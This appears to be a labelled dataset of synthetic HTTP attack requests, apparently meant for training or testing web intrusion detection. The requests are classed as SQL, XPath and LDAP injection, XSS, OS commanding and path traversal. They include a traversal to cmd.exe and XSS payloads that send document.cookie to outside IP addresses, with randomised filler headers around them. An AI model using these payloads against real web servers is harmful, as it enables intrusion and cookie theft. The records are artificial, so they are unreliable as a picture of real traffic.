~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39632
Start - Id: 41594
class: SqlInjection
GET /intau4oleuesitqiurno/Beptathoesetyr/lehJl@1Uz5Xy/La980f/Pa39t/i4nKV0Vg/mg6aneropo/igHXJWEG61CYUg1TaP/eset8lnsnhOeil/aC@IBPWWGf/wUzU.css?uichiatnlt=icoidt64ayoVici&nerefIQb64=ieti%2F&opei=OR++++%27dres%27+%3D++++%27++++%27&nnsGbezWii=segadttELl&SlikeCF8imgqdPp=ho58&shp=hnEewioloeCcQ2the&egmuOi4reoEmp=wojoyn&9eenyjntni=816421&caEi8e6tsu5=20&wnsoojdre3tli=%3Ee&dexstRy=escript%3C&enlajmqau2eOrrn=0 HTTP/1.0
Host: www.lzRin.be:2
Connection: taaeoEgr
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: sa4s7lhu-0swdoO6;q=0.3, sinre-fg3ho6wn;q=0.0, aowen-orenrbnn, iehnpeqn-cdV5apa, lio2r64y-8;q=0.5
Cache-Control: eads='igs6'
Client-ip: 234.115.185.119
Cookie: cibo=jbY9;wlcopyzexecTUN62rz=euFdR76k;8dnuee=eneo;aN1Nlhi=763
Cookie2: $Version="1"
Date: Mon, 20 Dec 04 08:08:27 CET
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: eqidtzo
From: mainn@tiee.st
If-Modified-Since: Mon, 23 Mar 09 17:01:17 CET
If-Unmodified-Since: Fri, 28 Nov 08 04:04:24 GMT
If-Match: *
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: Tue, 21 Mar 06 04:32:38 CET
Max-Forwards: 3
MIME-Version: 3.6
Pragma: 4nehtl='esde8RFd'
Proxy-Authorization: Digest nc=d0D8Cc0E
Authorization: Digest qop=auth-int
Range: 7594-
Referer: http://www.zErt.ch/r5nsaP/iiiaY/weno4g3n/adpdmvf/iNtnvne2.swf
TE: trailers,trailers,chunked
Trailer: If-Range
User-Agent: qQ6Ay2yo http://www.sosd.cz
UA-CPU: StrongARM
UA-Disp: 8644,7671,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 1.2 110.10.137.212, 1.1 87.34.212.183
Transfer-Encoding: SmFhre
Upgrade: nmx/9.3, ydSwut/0.9
Warning: 847 www.anleg.shtml "zrln1iauersja5tRdVtt" "Tue, 11 Apr 06 24:20:03 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41594
Start - Id: 36452
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 159.121.225.146
Connection: close
Accept: */*;q=0.0
Accept-Charset: shift_jis;q=0.1, euc-jp, x-mac-arabic, x-mac-chinesesimp, x-mac-japanese;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 144.216.33.215
Cookie: a1nif0qrNecrw=ins7set5;nnZrpne=tshnahstdinee;fe7Tsyte=@hs;jrH=dRa;octu=dL-5RzeZLsx
Cookie2: $Version="920"
Date: Fri, 26 Nov 04 12:30:30 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 04 Apr 04 18:58:46 UTC
If-Unmodified-Since: Sat, 10 Mar 07 01:11:37 GMT
If-Match: "YrTK_IhAwjNM-PDjj"
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: *
Max-Forwards: 8
MIME-Version: 8.0
Pragma: remiah2t=ninyos
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM bnVobk5vaGt1aWhlY2VlaXN0UzZ1ZWVhaDB6dGNhZWl0TTE5c2g1MjVzcnRscA==
Range: 336-,5495-71936
Referer: http://www.Irqnstei.gov/rirr/se6ga/otnaed/g7rr/rukt1kca.txt
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: aoaftrethtaSei
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x6469
Via: HTTP/3.5 www.b5e4.jpeg
Transfer-Encoding: s4cxmE
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 29.240.171.31
X-Serial-Number: 8893219462168220047
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36452
Start - Id: 49870
class: XPathInjection
GET /a_fwjz3MxXzh0CNfry-/eaXf0uT_4tDE7/roec/aD9OtI5mFhNi.t7bSi/iTabceos/u9GBUKc/q2U/y9oTxQ3.bin?cnaY=cleallyornccieF%29optdocumentrsv&connectxxp_x=1m+scriptcavbscriptrdedDhome&PuHJ9SuxmlD=g+t%28y&aa=gn%3Dbgsoundsscriptvseszz%2Fd0g&ui=10985++or++++rqA%2FiaL%2Foanta%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D++++or++19401%3D HTTP/1.0
Host: www.ae7E.cz
Connection: close
Accept: application/*;q=0.6, text/*, application/*
Accept-Charset: utf-7;q=0.3, cp-936;q=0.8, x-mac-ce;q=0.9
Accept-Encoding: 
Accept-Language: Pss-f;q=0.1
Cache-Control: max-age=38
Client-ip: 119.142.72.137
Cookie: ert2hoL=nnheur;mmxUoptV=78;uwhmsotn3o7nsN=315138;vneoEiinzn=u4aZG;5nlJ=053
Cookie2: $Version="5"
Date: Sun, 20 Nov 05 03:36:03 UTC
ETag: "xcInQ_66Zglzx9B"
Expect: amoerel
From: eslc7@67owp.net
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 30 Jul 09 11:24:27 UTC
If-Match: *
If-None-Match: "kjPd5foA5vT_XVe7DJN"
If-Range: Fri, 20 Feb 09 14:42:52 CET
Max-Forwards: 0
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic ZWVic2FsVDp0c2VyZQ==
Authorization: Digest username="atbanh"
Range: -307462,64-76604
Referer: http://dftncoTe.uk/thjKueai.sh
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.7 (compatible; MSIE 2.7; WinNT; s7cvke; sitn)
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 2.2 www.cy5ouye.htm, 9.2 www.einiz0.shtml, FTP/8.7 43.45.229.39
Transfer-Encoding: Ctusg
Upgrade: hiv/6.0, 8geb/7.6, ssu82v/5.0
Warning: 968 www.Iurrcesn.jpg "rFd4tdex5ohayei4iC" "Wed, 21 Nov 07 23:43:23 CET"
X-Forwarded-For: 24.251.121.187
X-Serial-Number: 5095784293385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49870
Start - Id: 48063
class: XSS
GET /n3HizFdLBsvaeaAo4/mNN/i4abi56jM3Qz7At1./1rBaIrn/owlFAWyHbKQT@I0AX/sVOpJ5SLX/hkr/le5tp/mx0wpnsrlOieoTohi/mesanb/eHVutJtDQ6.@vl3Y.mdb?heD6emeo4u=rpoEgLbMoa&tfEi=%3Cimg++src+++%3D+++%22mocha%3A%5Bwindow.open%28%27http%3A%2F%2F13.129.164.130%2Fartiil.msf%27%2Bdocument.cookie%29%3B%5D++++++%22++%3E&ooIc4eu=ogreoi%26%29sYirrse HTTP/1.1
Host: 226.60.209.102:23876
Connection: mAe1m
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: htc-llenotr
Cache-Control: no-store
Client-ip: 43.162.196.251
Cookie: gt3iscccohs=81;s0a6fGMlF=nddHp;litod21eio9=heornonbhtr;weyloge3soSldab=fld;aioor=645929174;truoqnhliIipo=osai8z
Cookie2: $Version="9"
Date: Wed, 03 Aug 05 11:57:48 GMT
ETag: W/"@AY44BLRCYw-DcLtsp"
Expect: 100-continue
If-Modified-Since: Sat, 06 Jan 07 16:44:22 UTC
If-Unmodified-Since: Mon, 01 Nov 04 20:19:13 GMT
If-Match: *
If-None-Match: "gqNLXdeo-YVHoePWr"
If-Range: *
Max-Forwards: 7
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Yean xazroh=heTobre
Authorization: sedh aaieeArs=mnoE
Referer: http://ohghamt.uk/idteewal.jpeg
Trailer: Warning
User-Agent: Mozilla/5.6 (Machintosh; U; Mac OS X 1.6; nr-tt; rv:0.0.4) Gecko/39557375
UA-CPU: PowerPC
UA-Disp: 934,0978,32
UA-Pixels: 2342x2073
Via: b6ian/2.9 22.49.125.72, 9.8 154.110.167.73
Transfer-Encoding: gzip
Upgrade: wAre6i/8.0, kmnmln/4.1, u2nAT/4.0
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 0.164.67.65

null

End - Id: 48063
Start - Id: 47081
class: XSS
GET /f7sEKl2l2rShK_@1T/srn6jmitp/pX/tZ/cHJ3aoaHfsPFRWV21/xIeFa5gwP_cVJQJi6Anv/ohjs.gif?ntifntehvhlec4s=%3FNtd%3EaiframeClx9&9brm=%3Ciframe++src+%3D+++%22+vbscript%3A%5Balert++%28%27Groioi%27%29%3B%5D++++%22+%3E&lrn=jttty%28hd9icjb&tlSriiowlcc=lzL&rdritleht=5&totro5cep=190312&PPW@G8V6=1921164615&fXbog=i1position0nttsse&U8at4ajlntse=er%40nj+orN&gtimrlraol6knme=3057&rCops3rtme=422&trc=metft&4eeyd9=ny.d HTTP/1.0
Host: 26.168.147.107
Connection: close
Accept: text/html, audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: euya='resi'
Client-ip: 25.88.59.6
Cookie: ightNeedzele=k;ntteh2n=794;OEQlQM=n8pelShoreersaeRs;est=h ;4JO2=tQaMot-zsENP;qWa6wwbtlaa=148071
Cookie2: $Version="044"
Date: Tue, 24 Jun 08 24:30:09 GMT
ETag: W/"5flgWqTfDcqEkoyRjTt"
Expect: 100-continue
From: en3oiyg@ysel.org
If-Modified-Since: Fri, 09 Jul 04 09:58:51 GMT
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Nov 07 05:47:14 GMT
Max-Forwards: 1518
MIME-Version: 8.0
Pragma: esannB=eoOt9ke
Proxy-Authorization: sevi uteRs=ionsesm
Authorization: gnvo rencD9rr=tnetr1o
Range: -409656
Referer: http://sphgo.it/noaEso/sgtprzi8.tiff
TE: trailers
Trailer: Warning
User-Agent: Mozilla/4.1 (Machintosh; U; PPC Mac OS X 0.4; em-wr; rv:7.8.4) Gecko/94863730
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 071x3560
Via: 1.1 www.oeiui.gif:89, 7.9 www.vtbyicn.jpg
Transfer-Encoding: identity
Upgrade: keTun/5.2, keYr/6.3, ierin/2.2, rla/1.3
Warning: 699 www.gnimlw.jpeg "bgtHtysIo0h" "Wed, 01 Aug 07 11:24:11 UTC"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 60697232
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47081
Start - Id: 45397
class: PathTransversal
POST /fplJkIS@waDSQg/avdRqgqOmYdS69/vTF3d1pnBMiBVHGM2nQ4/tslojp/n2maPycqe95K/eOzr5plewwhip0si/wla/tzrZyrHNa6x/reUGHFu@2PzUmIc1nzUk/Orvaoluuiml58/nlLHKtvpvTk_56@uVRTy.gif? HTTP/1.1
Content-Length: 256
Content-Language: gsdr7i
Content-Encoding: deflate
Content-Location: http://hciRido.uk/egwp9bs.swf
Content-MD5: bm1iMHl0ZUt1bmxwYm5kNg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 22 Jul 08 14:53:01 GMT
Last-Modified: Wed, 29 Dec 04 12:10:54 GMT
Host: www.8arseq.com:80
Connection: c1heB
Accept: text/*, video/*;q=0.6, audio/*;q=0.7
Accept-Charset: x-mac-icelandic, iso-8859-1, x-mac-roman;q=0.3
Accept-Encoding: gzip, deflate, compress;q=0.3
Accept-Language: k-wcsh, sGdsa1o-3qs;q=0.5, hndotrs-atoG;q=0.4
Cache-Control: only-if-cached
Client-ip: 2.231.241.65
Cookie: tntiyd5rh=gosi82y;7umto=DdGlibpswdt1%u;M8TP8.Os=bupa6;ah69tfo=0185336873;a6teeEdxdlaoSha=9798;5bnt1szthmz=3
Cookie2: $Version="269"
Date: Sat, 06 Nov 04 18:35:34 GMT
ETag: "RhUCdqpfah3Wpo-1lZ"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 14 Nov 09 23:45:11 UTC
If-Unmodified-Since: Sat, 13 Nov 04 09:57:01 CET
If-Match: "1Nl7wxjnA0ktGHewCH"
If-None-Match: *
If-Range: Tue, 25 Apr 06 20:47:21 UTC
Max-Forwards: 73
MIME-Version: 1.9
Pragma: 3ttseau='ierl'
Proxy-Authorization: qei4S 0e1e=mede
Authorization: NTLM c2JrMmhlZ0NwdXNoZGJBaE5scnNhaXNudHNldGl5c2QwbQ==
Range: -0363
Referer: /sig46orT/crli/iaUo/gnbRbdso/l8RIe2ro.shtml
TE: trailers,deflate,deflate;q=0.5
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.7 (compatible; Konqueror/6.7; SunOS sun4u; rpr3i3eorm)
UA-CPU: StrongARM
UA-Disp: 088,174,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 789x027
Via: 5.5 174.239.41.183
Transfer-Encoding: compress
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 335 www.lrsn.css "oRaie" "Sat, 09 Aug 08 10:06:34 GMT"
X-Forwarded-For: 32.85.66.113
X-Serial-Number: 279789
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rst=251577&jEZ=ahaoWicrnmwiliEi&eZELansIhen6=3&uTdonm1=impaiiNrg&Terinon=a4psQLTv&wkMPgihg3j7=Bsry&Dyjloelo3='1m trmi&Rn-6hefandd=/../../../../Inetpub/iissamples/nanast/esnitetiri/ndolllitni/aratroatre.nsf&ZiaEraLU6hrun=t1sPd-&e6=3811

End - Id: 45397
Start - Id: 49905
class: XPathInjection
GET /nsnc/naE5drs4a/cybearuay/q4jWYPzRw_I/ai5HwCF61fcdCW-a9/igdnOca9inotnma/9cGoirNVjuZx0Lu.shtml?en1aT25nuiioAW=4828++++or+++++1%3C++hstdr%2FUg%2Fme0y%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D6%5D+++or+3368%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&tbIz9als4ttiv=t4rslNu HTTP/1.1
Host: 224.174.0.127
Connection: close
Accept: text/*;q=0.1, audio/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 46.208.216.230
Cookie: 9LtelnetdH=awnoehOs;_RPdb=an>ti);oecer=te%%o/laccepti7dsv;7oztri=altsee0wneRtr=8crw;Crgestte1edglj=c@S-wnTagit
Cookie2: $Version="743"
Date: Mon, 19 Apr 04 05:02:12 CET
Expect: 4rzr
If-Modified-Since: Wed, 25 Jun 08 05:29:33 UTC
If-Unmodified-Since: Sun, 25 Sep 05 11:27:08 GMT
If-Match: "VgRM.hzWFWwvjV@43"
If-Range: Fri, 15 Jul 05 05:42:04 GMT
Max-Forwards: 6
Pragma: 63aee='nt'
Authorization: ia3b sara=5iwwpoh5
Referer: /s4oietia/npvunm7o/nzesalr/icwF8ed/0hke.dll
User-Agent: Mozilla/2.0 (compatible; 9inve; Win 9x; h3hLd)
Via: 3.1 173.146.101.38
Transfer-Encoding: compress
Upgrade: anma/6.5, Quer/3.7, samre/6.1
X-Serial-Number: 70298520558
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49905
Start - Id: 47354
class: XSS
GET /bFkX@LBeq6YFz/sH/EsiUedYienkd.js?hnvf=%5B%5CxC0%5D%5B%5CxBC%5Dscript++%3E%5Bwindow.open%28%27http%3A%2F%2F44.148.226.29%2Fla.msf%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++%3E&utPEoxdbe=mes- HTTP/1.0
Host: 168.7.197.216
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 46.13.165.123
Cookie: ros=gam;ne5yet=wYasTKE.YeW;e7tIlsie=$hwindow.opents?bbctrconnecta 5(d
Cookie2: $Version="75"
Date: Tue, 13 Jan 09 04:28:02 CET
ETag: "mIzAAV5Ptg5ejv@T"
Expect: 100-continue
From: hrsita@gtnEqlet.org
If-Modified-Since: Wed, 09 Nov 05 06:42:29 CET
If-Unmodified-Since: Sun, 05 Jul 09 12:41:16 GMT
If-Match: "@j4e_aIs.vVcPL8PK"
If-None-Match: *
If-Range: "4IXXXt3uiVAq3fz"
Max-Forwards: 187
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic ZW9pcWVsZzptdHNsRA==
Authorization: tzlma dsiixmto=lersh
Range: -066761,152-
Referer: http://ejtwV.ch/xeh8/h7si.jpg
TE: deflate
Trailer: Trailer
User-Agent: mlsnjhhder1eise
UA-CPU: MIPS
UA-Disp: 2126,5333,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 781x9042
Via: Efe/3.6 www.nEnESanm.js:9313, FTP/3.1 www.emeot.js, 5.0 6.90.244.215
Transfer-Encoding: gzip
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 942 133.3.67.151 "re4lwp" "Wed, 23 Jun 04 23:49:55 CET"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47354
Start - Id: 35844
class: XPathInjection
GET /Lo@0ZXYJG/H5/olyahge/3wnmopeatio.php3?oo=Wdivuss4d%3Eni%28&ilgmin6eo=381748&htB=ti5Lco%27++or+++++6+++%3C+++count%28path%2Fchild%3A%3A*%29+++or++%27zwncpsA%27++++%3D%27&bO=mtne%5Cuea%5Ddt0o+n+%3F HTTP/1.1
Host: 132.253.95.204:66011
Connection: c9zgnm
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tJeuh-vp;q=0.2, dEs-heE, yo-a
Cache-Control: max-stale=64278
Client-ip: 177.161.53.181
Cookie: HWEW7tmpOmailperlVsock_stream=6384333;lthSegzhsepna=soiLil ;ut=eydxiqhiselectabgsoundko spid;pVY62bznullwOM=yJwoPGnnBE9
Cookie2: $Version="217"
Date: Wed, 10 Oct 07 18:00:18 GMT
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: sc2nG
From: eAhiWa@3utA.st
If-Modified-Since: Tue, 15 Dec 09 22:43:48 CET
If-Unmodified-Since: Wed, 06 Feb 08 17:16:29 CET
If-Match: *
If-None-Match: "Q.FWvqyKcZ9A1-P0qGi"
If-Range: *
Max-Forwards: 99
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: Digest username="4dg6s4u"
Range: 77-,-9
Referer: /nthe5el.mp3
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: ruaheoeoCnAYe
UA-CPU: Sparc
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: 7.5 www.aid3rrs.jpg, unuse/9.8 www.yvnsDhjy.gif, FTP/6.3 175.87.111.111
Transfer-Encoding: identity
Upgrade: ml1/5.5, VeaAtn/8.1, thmg/1.6, lbedtw/3.5
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 4375504120
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35844
Start - Id: 37425
class: LdapInjection
GET /wl3uHy5ptiO/9h/aTM3Kgj/Miid5NiTyE.pjI/4CnA/taeeqnlu/wkHmXlikeZbK6Eg3i.html?PtjlW=aeb%24%40i%29e%27n&nywnb=6&knlbblsr=a4%3Bnakondeletecath%28gncE&unionprinsertPs-objectxv=2e&ereasjee=yAmvdg4&dhW_FzeIFL=etwlh8eetyS HTTP/1.1
Host: 155.241.181.61
Connection: close
Accept: */*;q=0.2
Accept-Charset: isiri-3342, iso-8859-8;q=0.8, iso-2022-kr, iso-2022-kr, windows-1258
Accept-Encoding: 
Accept-Language: n-tk;q=0.1
Cache-Control: max-age=8463
Client-ip: 95.170.99.54
Cookie: tsiliirho3od=qqn;e1e=iGpdesl;5GrsRPOQ=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="22"
Date: Sat, 20 Mar 10 06:02:24 UTC
ETag: W/"jyj7JOjeift_AQZkPrt"
Expect: 100-continue
From: hies@394a.com
If-Modified-Since: Thu, 07 Feb 08 22:48:07 CET
If-Unmodified-Since: Sun, 15 Feb 09 08:17:12 CET
If-Match: "GfNxkrwpeEdzw35d9Nn"
If-None-Match: *
Max-Forwards: 9846
MIME-Version: 1.2
Authorization: s0hed rie6=8ievinys
Range: -18725
Referer: /fClo/alto9.dll
TE: trailers,chunked,trailers
Trailer: Warning
User-Agent: Mozilla/7.4 (compatible; MSIE 2.2; WinNT; odutne; iU6nx)
UA-CPU: 68000
UA-OS: Solaris
Via: ggeYnn/5.5 52.237.230.108, HTTP/9.0 79.122.155.35
Upgrade: suai/1.3
Warning: 190 www.lgej1Kt.html:5875 "3lulSzaNSoesnaaqcel1" 
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 37425
Start - Id: 44904
class: PathTransversal
GET /t2oabc5l03hms/u_IwKAY/ic/rnlneehy/kcdYF5Bel9wWcI/k4XVQ76v.aspx?auWgt=..%2F..%2F..%2Fmetote%2Fadmin.txt&dylpacyons=sfti7rAjnc&dTmu7=dOrwas4tshoreio&tpnbre=eeeedareites0&o5allz8=0227&uferon9toaaesr=f3QEJVd5O8g&edO=9&H8dLboot.iniQyNchild=ileptnshTopL&iyuanheyf=738&3e=btetfquhtcr0o&PCw8rcpEvm=tnjeeyVwsreplaceh HTTP/1.1
Host: 136.142.80.198
Connection: close
Accept: application/*, audio/basic
Accept-Charset: x-mac-chinesesimp, cp-950, iso-8859-9;q=0.6, x-mac-roman;q=0.7
Accept-Encoding: gzip
Accept-Language: c-jraic, ey-l
Cache-Control: min-fresh=32
Client-ip: 139.102.255.156
Cookie: tipfldua7sit==re[>isOuTy>epuF;ltTirtphrpwhb=msuqTohftu
Cookie2: $Version="2"
Date: Fri, 07 Jan 05 22:45:18 UTC
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Sun, 19 Feb 06 02:42:27 UTC
If-Unmodified-Since: Wed, 12 Nov 08 06:00:59 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4939
MIME-Version: 9.2
Pragma: 0=otq
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic V3NFU2lwY2w6ZWF5YTRs
Range: 50635-77
Referer: /o6ss/3etif/ozart/24gacpE/htie.mpeg
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.0 (Windows; U; WinNT 1.8; jl-gr; rv:7.8.0) Gecko/16648912
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6797x3315
Via: 3.6 118.2.60.187
Transfer-Encoding: compress
Upgrade: bSv/3.5, tpb/0.4, sbReuF/5.2, taf/0.6, 3ghel/8.4
Warning: 600 135.61.40.75 "toa8hm6a" 
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44904
Start - Id: 50006
class: XPathInjection
PUT /seeh28rns/hsod8onestndepIn/nas5pt/rgja92@hVVP1l/hcita1spnRdwlhwg/5j11XKv/uUtNZJsLLEiv-4OSR/eS8HnLKn.3YSE/o@YaajWU@eD@_ix6Hh/e8BO9xrd0xP6hBNXHGS7/SthejHh6dvHsod.mdb? HTTP/1.0
Content-Length: 216
Content-Language: empr5t
Content-Encoding: deflate
Content-Location: /st93tiql.swf
Content-MD5: d3BzckkyZW92YmFlYzcycw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Jan 05 10:50:29 GMT
Last-Modified: Mon, 09 Feb 09 24:33:45 UTC
Host: www.hbiio.com
Connection: close
Accept: */*;q=0.9
Accept-Charset: utf-8, us-ascii
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 63.249.228.10
Cookie: cD_.E=NetrtBn9yhew;iho=oineb;leobseb=r;Vuhe=09;lc=5863;7n4bg=rmGtdt4qzyer
Cookie2: $Version="434"
Date: Fri, 01 Jan 10 18:33:20 CET
ETag: W/"_2XPRTZTzEEtnxCG"
Expect: SEeuet
From: etjd@onalE.be
If-Modified-Since: Sat, 18 Dec 04 09:14:55 GMT
If-Unmodified-Since: Thu, 23 Aug 07 04:06:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8949
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="Esaae"
Authorization: fo3o Zogus=zmeckhsf
Range: 1-0902
Referer: http://etotidll.ch/CzaOae/Y5ssooep/biina/z3sf.avi
TE: trailers,gzip
Trailer: If-Match
User-Agent: Em/grd/h/child::node()[    position()=9] | whccaE/lv6e8d/istm3/child::text()[position()=84]     or     'heeei' =   '
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Pixels: 957x1532
Via: 0.6 www.aen1dju.html, 8.8 239.201.126.37:6113, 6.8 42.12.3.62
Transfer-Encoding: tarr
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 930 www.EosRdrh.tiff "etleodlp" 
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

QlAj.Kbz=3tuhnrDwlI5rElb&ton=tas?cs'&i9iaf9ee=aysystem&hpassthru3p_P1= ae&DTEQqvar0YBti=eOvWmGFQK&emt5i=504&us36ntbleo1aIy=8a5ba&usirtnawWjt=iQ4a.lWK&wehreSuo=52&Woet4diic=Rorynkster&gm.hE_8dhq=mtf8i&HWwhome=Msbh

End - Id: 50006
Start - Id: 50024
class: XPathInjection
PUT /cK1fZXTh65b/4sservicesGN3H/aOIz/isRiUL_hb7ydPNqtJT./alnwRdtteB/se9yew8swrr/mirklMkoasi/eA67X389dgs./nsLKT7V6HRKW.ac/cqangleeosonksTe.dll? HTTP/1.1
Content-Length: 107
Content-Language: Tbohon,oyohlgt
Content-Encoding: compress
Content-Location: /ssny72sx.msf
Content-MD5: d2pGdGlha2lsZW9BZmkybA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 17 Apr 04 08:13:22 GMT
Host: 239.94.203.197
Connection: close
Accept: */*;q=0.2
Accept-Charset: euc-jp, iso-2022-jp;q=0.7
Accept-Encoding: *
Accept-Language: pn9y-Hws;q=0.4, sixetd-etelrs;q=0.0, Ma-neHEr
Cache-Control: eu='Dtriaceh'
Cookie: 2toe62aoC=875503;dnnt0tnftaR=e41-wf;CbLbeD=386197
Cookie2: $Version="14"
Date: Wed, 01 Dec 04 18:58:50 GMT
Expect: 100-continue
From: rr0e5a@p6PSnt5Xu.de
If-Modified-Since: Sat, 08 Jan 05 21:19:36 CET
If-None-Match: "VPlkP62YgwxGI3Q1"
Max-Forwards: 770
Proxy-Authorization: Basic NWl0ZWVlc2k6bnVhcGc=
Authorization: Digest username="1oupNa6o"
Referer: http://www.elbny.fr/hmnewske/ainj6/Eetxnspe/3oaaatn.nsf
TE: gzip;q=0.8,trailers,gzip
User-Agent: 8    or  t/bttae/Iu/child::node()[position()=61]     or     24880=
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 412x6538
Via: 9.8 228.53.74.226:823
Upgrade: odsrn/7.3, noifE/8.7
----: ------------------------------

ryevtttuMw=3752&ohdnje=pjkajji4&4yFZMHvP-JQ=6827924&vldeleteKlposition9nu1= passthrushutdownselectl&ts=1585

End - Id: 50024
Start - Id: 47422
class: XSS
GET /itbda1I/ra084ehat/YBb_IOQaTdbC/aDautoexecSA/9Ctfnowregiicrei/aP.ARH/odGlhhiraarp9oizso1/sssgdn80po.htm?rjpotb2sLwIopo=%3Cxml+++src++++%3D++++%22+javascript%3A++%5Balert++%28%27ir2ef%27%29%3B%5D+++%22++%3E&oubE=helJheiegteu&nisnoSTotsi5=uR%3Fwlnousrzy%3F8nm%24imgopt&ry5ed3ebmcvSree=orn+9&aV45n=dsod%28&iszeeVai=k.c&wicatbey=iti6rexectT&ge4vdb=eservices3e&hNtec8e8lNetdtp=C2ih%29dh%287r%29s&rrQnV=fnem+%5D%29T&qojS=C+&Ofenlki9=ttt1ibma HTTP/1.1
Host: 153.115.34.240:80
Connection: close
Accept: audio/*
